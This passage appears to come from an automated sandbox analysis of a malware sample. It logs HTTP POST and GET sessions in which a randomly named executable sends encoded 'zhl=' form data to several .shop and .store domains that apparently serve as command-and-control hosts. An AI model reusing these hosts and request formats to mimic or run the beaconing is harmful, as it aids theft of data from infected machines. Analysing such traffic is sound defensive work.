                                                                            Nov 5, 2024 15:23:50.096906900 CET813OUTPOST /8r0w/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.komart.shop
                                                                            Origin: http://www.komart.shop
                                                                            Connection: close
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.komart.shop/8r0w/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 51 78 6a 48 71 49 36 6b 75 67 39 74 65 38 43 38 38 49 38 77 61 56 6b 42 42 56 4d 67 54 4b 77 72 76 6b 4e 79 66 4c 2f 5a 32 57 46 70 72 4f 73 44 2f 32 33 59 51 71 72 49 72 78 76 30 4c 47 6d 78 72 65 2f 47 2f 4b 43 59 37 55 36 75 73 72 6d 69 39 7a 42 6c 43 61 4a 56 68 78 55 71 75 5a 65 7a 4a 68 76 71 6a 33 36 51 46 6f 52 37 55 74 76 54 43 4c 55 52 33 75 6b 73 51 34 39 66 6e 57 55 34 47 78 6a 42 6c 76 6c 78 62 57 66 57 52 46 5a 37 70 59 59 4e 43 70 55 66 55 67 36 4d 55 66 79 37 76 73 68 4c 56 39 6a 39 76 71 4d 68 44 38 37 4b 52 7a 30 70 6c 4a 30 57 32 4b 37 6e 59 45 38 71 51 6c 36 36 57 35 65 39 41 31 55 65 65 6b 62 61 39 51 71 63 6c 72 63 3d
                                                                            Data Ascii: zhl=QxjHqI6kug9te8C88I8waVkBBVMgTKwrvkNyfL/Z2WFprOsD/23YQqrIrxv0LGmxre/G/KCY7U6usrmi9zBlCaJVhxUquZezJhvqj36QFoR7UtvTCLUR3uksQ49fnWU4GxjBlvlxbWfWRFZ7pYYNCpUfUg6MUfy7vshLV9j9vqMhD87KRz0plJ0W2K7nYE8qQl66W5e9A1Ueekba9Qqclrc=
                                                                            Nov 5, 2024 15:23:50.978941917 CET668INHTTP/1.1 404 Not Found
                                                                            content-encoding: gzip
                                                                            content-type: text/html
                                                                            date: Tue, 05 Nov 2024 14:23:50 GMT
                                                                            etag: W/"67231618-2b5"
                                                                            server: nginx
                                                                            vary: Accept-Encoding
                                                                            content-length: 454
                                                                            connection: close
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                                            Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.455730133.130.35.90804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:23:52.651947975 CET10895OUTPOST /8r0w/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.komart.shop
                                                                            Origin: http://www.komart.shop
                                                                            Connection: close
                                                                            Content-Length: 10300
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.komart.shop/8r0w/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 51 78 6a 48 71 49 36 6b 75 67 39 74 65 38 43 38 38 49 38 77 61 56 6b 42 42 56 4d 67 54 4b 77 72 76 6b 4e 79 66 4c 2f 5a 32 56 6c 70 71 39 6b 44 2b 56 66 59 58 71 72 49 77 78 76 6b 4c 47 6e 30 72 59 58 34 2f 4b 4f 6d 37 57 43 75 74 4a 75 69 71 79 42 6c 49 61 4a 56 6f 52 56 74 77 70 65 71 4a 68 2f 32 6a 33 4b 51 46 6f 52 37 55 75 6e 54 55 71 55 52 36 4f 6b 74 58 34 39 44 78 6d 55 51 47 78 37 52 6c 73 4a 4c 61 6e 2f 57 51 6b 6c 37 71 74 30 4e 4c 70 55 42 54 67 36 55 55 66 2b 6b 76 73 56 35 56 39 57 6f 76 71 34 68 43 5a 4f 6e 4d 33 6f 32 2b 75 5a 4c 72 49 2f 39 51 57 77 4d 56 6c 37 48 57 63 58 39 62 46 6f 68 52 31 6d 33 6c 77 4c 5a 77 65 67 75 46 69 45 2b 4e 76 54 53 2b 2b 44 35 6c 4e 51 4d 6c 4d 35 47 79 4a 75 37 67 48 66 44 4d 71 68 6b 6b 4c 53 47 6a 67 7a 33 4c 42 6d 4f 75 39 52 6c 65 47 75 71 35 45 54 34 56 55 72 53 7a 74 77 47 31 30 73 56 32 56 69 4c 6b 58 70 37 68 41 76 4c 75 53 50 33 6d 6f 43 62 57 70 31 47 2f 4e 47 4e 54 74 79 61 37 44 6b 69 61 4a 78 2f 73 48 62 46 65 53 6a 32 52 41 [TRUNCATED]
                                                                            Data Ascii: zhl=QxjHqI6kug9te8C88I8waVkBBVMgTKwrvkNyfL/Z2Vlpq9kD+VfYXqrIwxvkLGn0rYX4/KOm7WCutJuiqyBlIaJVoRVtwpeqJh/2j3KQFoR7UunTUqUR6OktX49DxmUQGx7RlsJLan/WQkl7qt0NLpUBTg6UUf+kvsV5V9Wovq4hCZOnM3o2+uZLrI/9QWwMVl7HWcX9bFohR1m3lwLZweguFiE+NvTS++D5lNQMlM5GyJu7gHfDMqhkkLSGjgz3LBmOu9RleGuq5ET4VUrSztwG10sV2ViLkXp7hAvLuSP3moCbWp1G/NGNTtya7DkiaJx/sHbFeSj2RAS7o1HqbDYI/4eECoupkiA5KtxQ9DA4SW9W4ydDOXt6PQX2xu31QsjPZlTGt4mxukZsfJw+iRwoptFXcMpaFpDePapB41dAWH6cLEJCv56BsTiyS/Dw+eRH5fOXjwT3TW0N5r7glZgajYitlv51ZJLH83b/lz6vOK7SHmv+89RNJ8ZyRTuLqHX+Z4RS0EbAqy9yIFXlsI1oFOLDbzlZ0zyZFXRPkUHMKtLbUiooHF2A3fxiacUwFNAqjxWgEdONfFuvJxCJLRHiweoBzDP1IgBnTDSzBbkGv1jDrMsY2RNdJugtKjPkZUy/UfJmtBYDelk2QY02FFutf99tXaBG9mxggewonxdJui+rBDvny8VDqI/+xZDrsaLn/j2BUyf3l0nIHVmZs6biByYt+NDp+aoz1YlHI4bF/M4SMIjI1Lx7O7YnOsHIm50Vhob5aydny2+q+btGCrJjm/puf9F27/cvJx7T9jiJKK310E7HcORP7asr0E2D90sG+2ivoMuoQoEPbHOiO060GnjtlUvKUPEFprpju31GrTxaAcWxcLSOhTltHSfg7RZE7mh43m4LecLWDLr8fV5R4/thRjjfYb9IH1m6d0OWzwficO0wlbMwbX+/dRrfZjNJfFQUNs8EyfNUIxMisczS1KanVbj65ynkXoy2qDcqc0IA [TRUNCATED]
                                                                            Nov 5, 2024 15:23:53.540708065 CET668INHTTP/1.1 404 Not Found
                                                                            content-encoding: gzip
                                                                            content-type: text/html
                                                                            date: Tue, 05 Nov 2024 14:23:53 GMT
                                                                            etag: W/"67231618-2b5"
                                                                            server: nginx
                                                                            vary: Accept-Encoding
                                                                            content-length: 454
                                                                            connection: close
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                                            Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.455731133.130.35.90804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:23:55.185609102 CET536OUTGET /8r0w/?X8Rx1=znhhIbB8nN&zhl=dzLnp/+gugxgWqqjxp0mT2IbFg5vFvQvzyx0DqvE635uns4HxFL1cM/nxlijH3CXr4Dn+r6a2xCcjbq3+Q1mOYlqiQ0t9purOwXAnxy8DKlJc7DWVLNExsI= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Host: www.komart.shop
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Nov 5, 2024 15:23:56.084033966 CET883INHTTP/1.1 404 Not Found
                                                                            content-type: text/html
                                                                            date: Tue, 05 Nov 2024 14:23:55 GMT
                                                                            etag: W/"67231618-2b5"
                                                                            server: nginx
                                                                            vary: Accept-Encoding
                                                                            content-length: 693
                                                                            connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65 75 63 2d 6a 70 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 22 3e 0a 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2f 65 72 72 6f 72 2f 65 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.4557323.33.130.190804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:24:01.269614935 CET793OUTPOST /szao/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.teerra.shop
                                                                            Origin: http://www.teerra.shop
                                                                            Connection: close
                                                                            Content-Length: 200
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.teerra.shop/szao/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 38 4d 45 79 75 51 66 4c 45 35 31 67 6a 69 54 4a 69 31 6d 55 59 38 59 7a 54 2f 6d 52 48 56 36 6c 4d 7a 2b 39 74 47 70 4f 6c 31 38 6d 48 4f 50 65 69 6b 6f 6d 30 4e 6a 6f 6b 61 34 38 67 56 33 6d 79 76 76 6c 45 33 59 54 55 7a 61 44 65 61 7a 78 7a 76 59 6f 43 57 66 6f 43 59 57 6f 38 52 50 78 75 69 50 67 64 6e 4f 5a 64 59 4b 78 46 30 4f 74 42 2b 38 6b 74 52 37 49 75 45 6b 6a 4a 2f 42 62 30 45 35 6b 54 43 31 6b 44 63 4e 36 66 31 35 77 42 45 41 44 43 56 49 2b 35 7a 49 79 59 51 62 35 67 57 43 61 30 39 6e 65 4d 31 41 39 56 34 61 32 63 2b 7a 69 6a 49 69 36 38 62 41 2f 4a 4b 4d 63 4e 41 3d 3d
                                                                            Data Ascii: zhl=8MEyuQfLE51gjiTJi1mUY8YzT/mRHV6lMz+9tGpOl18mHOPeikom0Njoka48gV3myvvlE3YTUzaDeazxzvYoCWfoCYWo8RPxuiPgdnOZdYKxF0OtB+8ktR7IuEkjJ/Bb0E5kTC1kDcN6f15wBEADCVI+5zIyYQb5gWCa09neM1A9V4a2c+zijIi68bA/JKMcNA==


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.4557333.33.130.190804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:24:03.812220097 CET813OUTPOST /szao/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.teerra.shop
                                                                            Origin: http://www.teerra.shop
                                                                            Connection: close
                                                                            Content-Length: 220
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.teerra.shop/szao/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 38 4d 45 79 75 51 66 4c 45 35 31 67 69 44 6a 4a 67 55 6d 55 4d 73 59 30 57 2f 6d 52 4d 31 37 4e 4d 7a 69 39 74 48 38 46 6c 6e 59 6d 47 72 72 65 6a 6c 6f 6d 68 4e 6a 6f 38 71 35 32 75 31 33 74 79 76 7a 74 45 33 30 54 55 7a 4f 44 65 62 6a 78 7a 64 77 6e 44 47 66 71 4f 34 58 75 34 52 50 78 75 69 50 67 64 6e 61 7a 64 59 53 78 46 48 57 74 51 76 38 6e 72 68 37 48 70 45 6b 6a 43 66 41 53 30 45 35 43 54 48 52 4f 44 61 42 36 66 31 70 77 42 52 67 45 62 6c 49 30 6e 44 4a 4d 57 44 47 58 35 47 4c 43 36 76 58 6d 53 30 77 36 51 2b 4c 73 4e 50 53 31 78 49 47 4a 68 63 4a 4c 45 4a 78 56 57 50 43 46 69 4f 6b 35 2b 74 59 63 78 6b 39 52 46 54 6f 68 47 5a 4d 3d
                                                                            Data Ascii: zhl=8MEyuQfLE51giDjJgUmUMsY0W/mRM17NMzi9tH8FlnYmGrrejlomhNjo8q52u13tyvztE30TUzODebjxzdwnDGfqO4Xu4RPxuiPgdnazdYSxFHWtQv8nrh7HpEkjCfAS0E5CTHRODaB6f1pwBRgEblI0nDJMWDGX5GLC6vXmS0w6Q+LsNPS1xIGJhcJLEJxVWPCFiOk5+tYcxk9RFTohGZM=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.4557343.33.130.190804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:24:06.362786055 CET10895OUTPOST /szao/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.teerra.shop
                                                                            Origin: http://www.teerra.shop
                                                                            Connection: close
                                                                            Content-Length: 10300
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.teerra.shop/szao/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 38 4d 45 79 75 51 66 4c 45 35 31 67 69 44 6a 4a 67 55 6d 55 4d 73 59 30 57 2f 6d 52 4d 31 37 4e 4d 7a 69 39 74 48 38 46 6c 6e 51 6d 47 59 54 65 69 47 41 6d 6e 39 6a 6f 69 61 35 37 75 31 33 77 79 76 37 70 45 33 49 6c 55 78 32 44 52 63 6a 78 78 73 77 6e 4a 47 66 71 54 6f 57 70 38 52 4f 70 75 69 66 6b 64 6e 4b 7a 64 59 53 78 46 43 61 74 51 2b 38 6e 70 68 37 49 75 45 6b 6e 4a 2f 42 33 30 41 55 35 54 47 51 37 43 71 68 36 66 56 5a 77 4d 43 49 45 53 6c 49 36 6d 44 4a 45 57 44 4b 55 35 47 58 4f 36 76 50 41 53 30 45 36 63 35 71 71 65 4e 57 4b 70 70 61 31 37 63 64 37 47 5a 68 34 53 4d 2f 35 76 64 49 44 38 76 77 4a 79 6e 6f 66 42 77 34 43 55 4f 77 57 6c 74 6c 44 59 54 56 54 2b 66 6a 72 67 43 69 64 39 34 64 43 4c 65 71 47 66 32 7a 48 71 30 39 68 6b 55 47 38 67 42 73 72 38 39 31 45 45 67 48 2b 51 53 4d 61 70 4d 79 4d 6f 42 78 52 6d 71 46 33 61 56 52 39 41 65 4a 7a 30 6a 42 51 61 74 38 77 59 62 62 78 4a 2f 39 45 42 32 78 76 36 56 69 52 6c 44 5a 48 48 70 48 47 6b 46 56 55 77 74 74 54 70 44 70 32 6e 39 [TRUNCATED]
                                                                            Data Ascii: zhl=8MEyuQfLE51giDjJgUmUMsY0W/mRM17NMzi9tH8FlnQmGYTeiGAmn9joia57u13wyv7pE3IlUx2DRcjxxswnJGfqToWp8ROpuifkdnKzdYSxFCatQ+8nph7IuEknJ/B30AU5TGQ7Cqh6fVZwMCIESlI6mDJEWDKU5GXO6vPAS0E6c5qqeNWKppa17cd7GZh4SM/5vdID8vwJynofBw4CUOwWltlDYTVT+fjrgCid94dCLeqGf2zHq09hkUG8gBsr891EEgH+QSMapMyMoBxRmqF3aVR9AeJz0jBQat8wYbbxJ/9EB2xv6ViRlDZHHpHGkFVUwttTpDp2n9mx1RAu+Ahc1iaP7KgkOsHOOv6jrsB3dAKUGJbVlkC6H2EEarD6hWn9N+S8tNrtQEE/4KMbi3GxFHoIdDDUSHtutpPL1IKfnBi5+UrcyaW5QA2HQe7O4Q6FlqrhepuK776D+wOoTh5GozjL5ovNXPIjjGP/JaFSfqjP4LKBayC5Nk1+R3xfa8j8rZ/ZWwDO8K12xl7ztn6/dQFf/2QktPhAtkfCKwn8OgWJmxJiqG3/Ar3jxxLy43Q5/hKtsYXDtxM6c9jxXyKHYbcQg182JgddZxi4AIKLeXtrI2/Y0GHEm/ZqlRIhu96EWmio8dIck19cQqHG2E2yROphmWlt04/bspt+OprosW/FS68p4hBlZKRjaJgbE8t7ELGj4UBxQ6K9SB/uQcjdR7nnj48tUcuJJU7d5mdt5vLAQ+KY5OmoUx0BH3sTvc4g/USaJPfTamibnmU3aDQzy6vk/vhfn1BEIrmQG+j2Sol/U+HXyyvyEM1n5gCjp2UKHHD1/BXZsgcODYL2cJCwzBAxvttvrzwTTr9ramFzwtr8HsIqH1L5cijNd8SLIrINI+UHZd5HuxZ4Fy4UeuoF/8sLnJ6q0H9lOOTNHi0pKR6A+0p07QWkKIV9eY2rJSWUTAKHaSEPrvVUkokYKME6zG1W4feRu6ewIQvepogQgXVF [TRUNCATED]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.4557353.33.130.190804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:24:08.902976990 CET536OUTGET /szao/?zhl=xOsStlDAPOZpiXvsnmuwA88PT6OXK0eKU2uFkXlZ1FsWMYGKmmEGy9m/gq1jsAT5roDCFnYyY1aFVaz80OwxPCjqIvTp6x+JqjH2NXebd4izNju9X+dPpzI=&X8Rx1=znhhIbB8nN HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Host: www.teerra.shop
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Nov 5, 2024 15:24:09.524441957 CET396INHTTP/1.1 200 OK
                                                                            Server: openresty
                                                                            Date: Tue, 05 Nov 2024 14:24:09 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 256
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 7a 68 6c 3d 78 4f 73 53 74 6c 44 41 50 4f 5a 70 69 58 76 73 6e 6d 75 77 41 38 38 50 54 36 4f 58 4b 30 65 4b 55 32 75 46 6b 58 6c 5a 31 46 73 57 4d 59 47 4b 6d 6d 45 47 79 39 6d 2f 67 71 31 6a 73 41 54 35 72 6f 44 43 46 6e 59 79 59 31 61 46 56 61 7a 38 30 4f 77 78 50 43 6a 71 49 76 54 70 36 78 2b 4a 71 6a 48 32 4e 58 65 62 64 34 69 7a 4e 6a 75 39 58 2b 64 50 70 7a 49 3d 26 58 38 52 78 31 3d 7a 6e 68 68 49 62 42 38 6e 4e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?zhl=xOsStlDAPOZpiXvsnmuwA88PT6OXK0eKU2uFkXlZ1FsWMYGKmmEGy9m/gq1jsAT5roDCFnYyY1aFVaz80OwxPCjqIvTp6x+JqjH2NXebd4izNju9X+dPpzI=&X8Rx1=znhhIbB8nN"}</script></head></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.45573631.31.196.17804324C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 5, 2024 15:24:14.681673050 CET799OUTPOST /p6ze/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.dverkom.store
                                                                            Origin: http://www.dverkom.store
                                                                            Connection: close
                                                                            Content-Length: 200
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Referer: http://www.dverkom.store/p6ze/
                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
